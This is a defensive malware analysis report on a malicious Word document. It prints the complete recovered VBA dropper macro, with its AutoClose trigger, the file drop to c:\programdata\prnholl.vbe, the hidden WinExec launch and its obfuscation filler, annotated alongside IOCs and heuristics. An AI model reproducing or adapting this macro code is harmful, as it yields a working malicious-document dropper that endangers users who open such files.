Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c4892e53db24a9b2…

MALICIOUS

Office (OLE)

560.0 KB Created: 2021-08-20 16:58:00 Authoring application: Microsoft Office Word First seen: 2021-09-17
MD5: 5b6eb7a9fc3713ab1ab79809b2c7a153 SHA-1: 1e3a9c2e30df3369bad98649d7fbed9057aef363 SHA-256: c4892e53db24a9b2de3509416dbd989bcbf900fc7801cdb52be1ed834b57cf09
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample contains VBA macros, including a module named `autoclose` whose `Sub Main` is Word's AutoClose trigger, so the chain runs when the victim closes the document (a common technique for executing code on document closure). The recovered source shows an embedded dropper rather than a downloader: `autoclose.Main` resizes `UserForm1`; the form's Resize handler calls `ResizeFormToScreen`, which writes the text held in the form's `Label1.Caption` to `c:\programdata\prnholl.vbe` via Scripting.FileSystemObject (the write sits in an error-handler block that is reached unconditionally), then `Sec` busy-waits about two seconds and calls `WinExec "cscript c:\programdata\prnholl.vbe", 0` (hidden window). As written, the launch is gated inside `If StrRpt = "" Then`, i.e. it only fires when none of the four Find terms occur in the document body, and a MsgBox is shown first. The trigonometry helpers (Pi/Csc/Cot/pow), the pasted Word Find/Replace macro and the unused constant are filler around these steps, and the kernel32 library name in the WinExec declaration is padded with trailing spaces, most plausibly to defeat naive string signatures. The second-stage script body lives in the UserForm binary stream (the label caption), not in this VBA source, so its behaviour — including whether it downloads anything further — cannot be determined from this artifact. Detection/IOCs: creation of c:\programdata\prnholl.vbe by WINWORD.EXE and a WINWORD.EXE → cscript.exe process chain.

Heuristics 7

  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Attribute VB_Name = "autoclose"
    Sub Main()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note for this sample: a VBA project was in fact recovered (see macros.bas under Extracted artifacts), so the premise of this heuristic does not hold here; treat it as redundant with OLE_VBA_AUTOCLOSE / OLE_VBA_MACROS rather than as independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — standard OOXML DrawingML namespace URI from the document structure; benign, not a network indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5583 bytes
SHA-256: ceb98bb50c831af3f1685c7786c3325ac97c086b44832fd3f5032dc4953e8956
Preview script
First 1,000 lines of the extracted script
' [analyst] Module "ThisDocument": attribute header only -- no procedure
' bodies were recovered for this module in the dump.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' [analyst] UserForm module. VB_PredeclaredId = True means "UserForm1" is an
' auto-instantiated global, which is what autoclose.Main references directly.
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E065A985-152F-45C0-99C4-7C0D3ED5655E}{643A229B-1567-42F2-9104-C96561766B9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' [analyst] Unused anywhere in the recovered source -- filler.
Private Const PSDFKWGHWIEWEFGHFOFJSODFG = 51



' [analyst] Direct import of kernel32!WinExec (PtrSafe variant on VBA7/64-bit).
' The Lib name carries trailing spaces; VBA still resolves "kernel32", so the
' padding most plausibly exists to defeat naive "kernel32" string signatures.
' WinExec is used once, in Sec, to launch the dropped script.
#If VBA7 Then

Private Declare PtrSafe Function WinExec Lib "kernel32          " _
(ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
#Else

Private Declare Function WinExec Lib "kernel32                                                 " _
(ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
#End If
  

' [analyst] Never referenced in the recovered source -- filler.
Private Function Pi() As Single
    Pi = 3.14159265358979
End Function
'=============================================================================================

' [analyst] Execution stage. Despite the trig name, this is where the dropped
' script is launched; it is reached from ResizeFormToScreen via "Sec 54.8".
' The code from "Application.ScreenUpdating = False" to "End With" reads like a
' pasted Word "Find liability words" macro (searches and highlights four terms)
' used as cover around the payload.
Private Function Sec(ByVal Radians As Double) As Double
    Dim Cosine As Single
  '
' Find_Liability_Words Macro
'
'
Application.ScreenUpdating = False
Options.DefaultHighlightColorIndex = wdBrightGreen
Dim StrFnd As String, i As Long, StrRpt As String

' Words to search for
StrFnd = "DefaultHighlightColorIndex,affirmative,all,Find"

With ActiveDocument.Range.Find
  .ClearFormatting
  .Replacement.ClearFormatting
  .Replacement.Highlight = True
  .Forward = True
  .Wrap = wdFindContinue
  .Format = True
  .MatchCase = False
  .MatchWholeWord = True
  .MatchWildcards = False
  .MatchSoundsLike = False
  .MatchAllWordForms = True
  For i = 0 To UBound(Split(StrFnd, ","))
    .Text = Split(StrFnd, ",")(i)
    .Replacement.Text = "^&"
    .Execute Replace:=wdReplaceAll
    If .Found = True Then StrRpt = StrRpt & vbCr & Split(StrFnd, ",")(i)
  Next
End With
' [analyst] Gate: the launch below runs only when none of the four terms were
' found in the document body (StrRpt still empty). A visible MsgBox fires first.
If StrRpt = "" Then

MsgBox "None of the terms were found.", vbOKOnly
    Cosine = Cos(Radians)
    ' [analyst] For the only caller's argument (54.8 rad) |cos| is roughly 0.18,
    ' so the Else branch -- the launch -- is the one taken.
    If Abs(Cosine) <= 0.001 Then
        Sec = 9999.999999

    Else
        Sec = 1 / Cosine
                Dim Tijd
        Tijd = Timer()
        ' [analyst] ~2 s busy-wait with DoEvents before launch (simple delay;
        ' possibly to let the file write settle or to outlast short sandbox runs).
        While Timer() - Tijd < 2
          DoEvents
        Wend
        ' [analyst] Launch: cscript runs the dropped file with nCmdShow = 0
        ' (SW_HIDE). IOC: c:\programdata\prnholl.vbe; process chain
        ' WINWORD.EXE -> cscript.exe. The .vbe extension suggests an encoded
        ' VBScript (VBScript.Encode); its content is not in this listing.
        WinExec "cscript c:\programdata\prnholl.vbe", 0


End If
Application.ScreenUpdating = True

    End If
End Function

'=============================================================================================
' [analyst] Never referenced in the recovered source -- filler.
Private Function Csc(ByVal Radians As Double) As Double
    Dim Sine As Single

    Sine = Sin(Radians)
    
    If Abs(Sine) <= 0.001 Then
        Csc = 9999.999999
        
    Else
        
        Csc = 1 / Sine
        
    End If
    
End Function

'=============================================================================================
' [analyst] Called only as a bare statement (Cot 7.65, Cot 241.5, ...) with the
' return value discarded -- no-op filler interleaved with the real steps.
Private Function Cot(ByVal Radians As Double) As Double
    Dim Sine As Single

    Sine = Sin(Radians)
    If Abs(Sine) <= 0.001 Then
        Cot = 9999.999999
    Else
        Cot = Cos(Radians) / Sine
    End If
End Function

'=============================================================================================
' [analyst] Called once as a bare statement (pow 3, 5.9) with the result
' discarded -- filler.
Private Function pow(base As Double, expon As Double) As Double
    pow = Exp(expon * Log(base))
End Function
'=============================================================================================


' [analyst] Step 2 of the trigger chain. autoclose.Main sets UserForm1.Width,
' which is the apparent trigger for this Resize handler on the predeclared
' form; the handler hands off to ResizeFormToScreen (the dropper). The Label1
' geometry lines and the discarded "pow 3, 5.9" result are filler.
Private Sub UserForm_Resize()
'As soon as the form is resized the image will follow


Label1.Width = UserForm1.Width
Label1.Left = UserForm1.Left
Label1.Top = UserForm1.Top
pow 3, 5.9
ResizeFormToScreen (UserForm1)
End Sub

' [analyst] Dropper. The resize arithmetic is cover; the payload write sits in
' the ErrorHandler block, which is reached unconditionally -- there is no Exit
' Sub before the label -- whether or not the cosmetic loop raised an error.
' The inherited comment mentions "On Error Resume Next", but the code actually
' uses "On Error GoTo ErrorHandler". "i" is never declared (no Option Explicit).
Private Sub ResizeFormToScreen(FrmName)
    'The 'On Error Resume Next' is needed because there might be
    'some controls on the form that may not support some of the
    'properties that will be set
    Cot 7.65
    
    'If the form's windows state is minimized or maximized then exit
    


    ' [analyst] Any runtime error below jumps straight to the write; success
    ' simply falls through into it.
    On Error GoTo ErrorHandler
    'Set the form's origin to 0,0
    FrmName.Top = 0
    FrmName.Left = 0
    
    'Resize the form's height, width , and font size
    FrmName.Height = FrmName.Height * 15
    FrmName.Width = FrmName.Width * 28
    FrmName.Font.Size = FrmName.Font.Size * 28

    'Loop through all the controls on the from and repostion every
    'control relative to the form origin, then resize thier width,
    'height, and Font.Size properties
    For i = 0 To FrmName.Controls.Count - 1
       FrmName.Controls(i).Left = FrmName.Controls(i).Left * 9
       FrmName.Controls(i).Top = FrmName.Controls(i).Top * 15
       FrmName.Controls(i).Height = FrmName.Controls(i).Height * 15
       FrmName.Controls(i).Width = FrmName.Controls(i).Width * 3
     

       'Note: The control's font will resize only if it is a truetype font
       FrmName.Controls(i).Font.Size = FrmName.Controls(i).Font.Size * 28
       
    Next i
    
ErrorHandler:
        ' [analyst] Early-bound Scripting.FileSystemObject: implies the VBA
        ' project references Microsoft Scripting Runtime (scrrun.dll).
        Dim fso As New FileSystemObject
        Dim TEXTSTREAM
        Dim Tijd
        Tijd = Timer()
        ' [analyst] ~1 s busy-wait (no DoEvents) before the write.
        While Timer() - Tijd < 1
          
        Wend
    Cot 241.5
   
    Cot 4.54242

    ' [analyst] Drop: CreateTextFile(path, overwrite:=True, unicode:=True) --
    ' a UTF-16 text file under c:\programdata, which is writable without
    ' elevation. IOC: creation of c:\programdata\prnholl.vbe by WINWORD.EXE.
    Set TEXTSTREAM = fso.CreateTextFile("c:\programdata\prnholl.vbe", 1, 1)
    Cot 42.1
    ' [analyst] The second-stage script body is the Caption of Label1 on
    ' UserForm1 -- stored in the form's binary stream, not in this VBA source.
    ' As far as the macro itself shows, this is an embedded dropper, not a
    ' downloader; the caption text is not part of this listing.
    TEXTSTREAM.Writeline (UserForm1.Label1.Caption)
   Cot 7.65
    TEXTSTREAM.Close
    Cot 72.614
    ' [analyst] Hand-off to Sec, which launches the dropped file via WinExec.
    Sec 54.8
    
End Sub



' [analyst] Entry point. A module named "autoclose" containing Sub Main is the
' Word AutoClose auto-exec trigger (OLE_VBA_AUTOCLOSE): Main runs when the user
' closes the document. Its only statement resizes UserForm1, which starts the
' chain UserForm_Resize -> ResizeFormToScreen (drop) -> Sec (execute).
Attribute VB_Name = "autoclose"
Sub Main()
UserForm1.Width = 5
End Sub